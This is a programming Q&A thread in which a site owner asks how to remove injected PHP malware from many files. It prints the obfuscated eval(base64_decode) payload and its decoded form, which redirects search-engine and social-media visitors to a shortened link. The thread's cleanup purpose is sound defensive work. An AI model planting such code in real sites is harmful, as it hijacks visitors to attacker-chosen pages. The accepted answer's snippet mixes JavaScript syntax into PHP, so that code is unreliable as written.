# Regular expression to match injected malicious code in PHP file

Tags: php, regex

I am working on a hacked website, almost 70% on the php files are infected, following redirection code is added in header, footer and before echo statements in almost every php file.

**CODE 1**

```
<?php    eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCnbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly90aW55dXJsLmNvbS9rcmcyOTNqIik7DQoJCWV4aXQoKTsNCgl9DQp9DQp9"));
?>
```

After decoding above code we get following code

```
<?php
error_reporting(0); $nccv=headers_sent(); if (!$nccv){ $referer=$_SERVER['HTTP_REFERER']; $ua=$_SERVER['HTTP_USER_AGENT']; if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: http://tinyurl.com/dxyvzua"); exit(); } } }
?>
```

For temporary purpose I have updated the  $_SERVER['HTTP_USER_AGENT']  to jaycobbmarley.com in index.php before anything executes so the above script will not execute at all.

It is very difficult to remove this code manually from each file so I am working on a PHP script that will scan all PHP files and remove above code, I want a regular expression that will find multiple occurrence of above malacious script (CODE 1)

If there a any ready made script to do such cleanup task pleas suggest.

Comment: A simple search and replace would work if they are all the same? Protip: if you got hacked/infected, mostly you should nuke it from orbit and use the last backup/good state.

Comment: That may be a sensible option.  Can we see a segment of infected code, a block of about 100-200 lines of php?

Answer (score 2, accepted):

```
var malicious_code = 'eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCnbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly90aW55dXJsLmNvbS9rcmcyOTNqIik7DQoJCWV4aXQoKTsNCgl9DQp9DQp9"));';
```

Loop through each file you want to remove the code from, loading the contents into `$all_content_from_a_file` and do this:

```
$new_content = str_replace(malicious_code, '', $all_content_from_a_file);
```

Then save over the existing file with the content of $new_content